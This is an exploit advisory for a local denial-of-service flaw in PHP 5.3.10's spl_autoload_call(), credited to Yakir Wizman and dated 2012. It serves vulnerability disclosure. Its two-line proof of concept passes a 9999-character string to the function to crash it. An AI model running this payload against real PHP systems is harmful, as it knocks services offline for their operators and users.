PHP spl_autoload_call() Local Denial of Service Exploit

Summary

PHP 5.3.10 spl_autoload_call() Local suffers from denial of service vulnerability.

Credit:

The information has been provided by Yakir Wizman.


Details

Vulnerable Systems:
 * PHP 5.3.10 spl_autoload_call()

$buffer = str_repeat(‘A’,9999);
spl_autoload_call($buffer);
?>

Disclosure Timeline:
Published: 2012-06-03

Categories: Exploits